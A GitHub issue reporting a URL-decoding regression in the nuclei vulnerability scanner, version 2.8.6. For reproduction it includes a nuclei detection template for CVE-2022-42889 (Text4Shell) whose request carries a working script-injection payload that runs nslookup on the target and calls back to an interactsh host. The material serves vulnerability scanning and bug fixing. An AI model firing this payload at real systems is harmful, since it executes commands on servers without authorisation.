Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

2.8.6 decoded automatically #3167

Closed
f0ng opened this issue Jan 8, 2023 · 0 comments · Fixed by #3211
Closed

2.8.6 decoded automatically #3167

f0ng opened this issue Jan 8, 2023 · 0 comments · Fixed by #3211
Assignees
@tarunKoyalwar
Labels
Priority: High After critical issues are fixed, these should be dealt with before any further issues. Status: Completed Nothing further to be done with this issue. Awaiting to be closed. Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors.
Milestone
nuclei v2.8.8

Comments

@f0ng
Copy link

f0ng commented Jan 8, 2023

Nuclei version:

2.8.6

Current Behavior:

In 2.8.6,the %7b%7d in yaml file will be decoded automatically

Expected Behavior:

the %7b%7d in yaml file will not be decoded automatically

Steps To Reproduce:

For example,CVE-2022-42889
the docker https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git
my yaml file:

id: CVE-2022-42889

info:
  name: Apache Text4shell
  author: f0ng
  severity: critical

requests:
  - raw:
      - |
        GET /text4shell/attack?search=$%7bscript:javascript:java.lang.Runtime.getRuntime().exec('nslookup%20{{Host}}.{{Port}}.getparam.{{interactsh-url}}')%7d HTTP/1.1
        Host: {{Hostname}}
        
    # unsafe: true
    stop-at-first-match: true
    # matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"
          - '{{Host}}.{{Port}}'

in 2.8.5,it works normally
image
image

but in 2.8.6,error

image

image

the same yaml file,in the different versions, the %7b and %7d are different

Anything else:
@f0ng f0ng added the Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors. label Jan 8, 2023
@ehsandeep ehsandeep added the Priority: High After critical issues are fixed, these should be dealt with before any further issues. label Jan 9, 2023
@tarunKoyalwar tarunKoyalwar self-assigned this Jan 9, 2023
This was referenced Jan 10, 2023
Closed
Merged
This was referenced Jan 17, 2023
Closed
Merged
@tarunKoyalwar tarunKoyalwar linked a pull request Jan 17, 2023 that will close this issue
fix url encoding issues and inconsistencies #3211
Merged
4 tasks
@ehsandeep ehsandeep mentioned this issue Jan 23, 2023
Closed
@ehsandeep ehsandeep added the Status: Completed Nothing further to be done with this issue. Awaiting to be closed. label Jan 24, 2023
@ehsandeep ehsandeep added this to the nuclei v2.8.8 milestone Jan 24, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@tarunKoyalwar tarunKoyalwar

Labels
Priority: High After critical issues are fixed, these should be dealt with before any further issues. Status: Completed Nothing further to be done with this issue. Awaiting to be closed. Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors.
Projects
None yet
Milestone
nuclei v2.8.8
Development

Successfully merging a pull request may close this issue.

fix url encoding issues and inconsistencies projectdiscovery/nuclei
3 participants
@ehsandeep @tarunKoyalwar @f0ng